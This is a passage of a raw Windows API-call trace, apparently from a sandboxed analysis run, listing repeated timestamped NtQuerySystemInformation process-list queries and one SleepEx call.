SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0216.081] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0218.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 